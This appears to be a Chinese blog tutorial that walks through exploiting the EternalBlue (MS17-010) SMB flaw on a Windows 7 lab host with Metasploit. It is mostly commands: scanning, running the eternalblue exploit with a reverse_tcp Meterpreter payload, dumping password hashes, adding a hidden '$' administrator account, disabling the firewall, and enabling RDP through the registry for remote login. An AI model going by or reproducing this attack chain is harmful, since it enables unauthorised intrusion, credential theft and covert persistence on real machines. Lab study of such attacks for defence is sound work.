zoukankan      html  css  js  c++  java
  • 永恒之蓝ms17-010 入侵windows系统

    准备:

    kali为攻击机,ip:172.17.2.132

    win7为靶机, ip:172.17.2.64

    使用msf模块。需要在同一局域网中。

    步骤:

    1.启动数据库服务

    service postgresql start

     2.开启msf

    3.搜索永恒之蓝

     4.使用永恒之蓝ms17-010漏洞

    use auxiliary/scanner/smb/smb_ms17_010

     5.查看选项

    show options

     6.查看靶机ip地址

     172.17.2.64

    7.设置rhosts为靶机地址

     8.运行run

     9.扫描具体的ms17_010(永恒之蓝漏洞)

    search name:ms17 type:exploit

     10.选择第0个。

    use exploit/windows/smb/ms17_010_eternalblue

    10(1)如果目标为win2003,则选择

    use exploit/windows/smb/ms17_010_psexec

    11.查看需要配置的选项。

     12.设置rhosts为靶机ip。

     13..显示攻击载荷。

     14.选择设置windows/x64/meterpreter/reverse_tcp的攻击载荷

    set payload windows/x64/meterpreter/reverse_tcp

     15.再次查看配置。

     16.检查无误后运行

     17.运行成功,连接上。help或者?可以打开帮助。

     

     18.getuid,获取靶机账户

     19.查看靶机的用户名及密码,可以看到cover为账户,:后的md5为密码。

    如果md5破解不出,可以添加账户。

    19. shell.

     20.看到出现乱码了,chcp 65001 可以解决。

     

    21.net user,查看用户

     22.添加qwer用户 密码为123456789

     

    22(1)

    添加隐藏账户

    net user test$ 123456 /add

    提权至管理员账户

     net localgroup administrators test$ /add

    注:

    用户名要以$结尾

    添加后,该帐户可在一定条件下隐藏,输入net user无法获取

     23.将qwer提至管理员权限。

    关闭防火墙
    命令:netsh firewall set opmode mode=disable

    查看防火墙状态:netsh firewall show state

    24.安装远程桌面软件

    apt-get install rdesktop

    24.REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f          打开3389远程连接端口

    25.在命令符中输入

    rdesktop 172.17.2.64  进入远程连接。

     隐藏账户要加入$

     连接成功。

    本人小白,不接受任何合作,文章多为转载,如有侵权请联系。
  • 相关阅读:
    wtl 支持托拽文件并在ListBox框中显示文件路径的方法
    提升本程序进程优先级和权限(VC++源代码)
    Win7下运行VC程序UAC权限问题
    Flex中带for的循环
    Flex注释
    Flex建立编译环境
    Flex事件驱动机制
    Flex应用程序的系统开发周期
    Linux下c开发 之 线程通信
    将 Win32 C/C++ 应用程序迁移到 POWER 上的 Linux,第 1 部分: 进程、线程和共享内存服务
  • 原文地址:https://www.cnblogs.com/thespace/p/14680055.html
Copyright © 2011-2022 走看看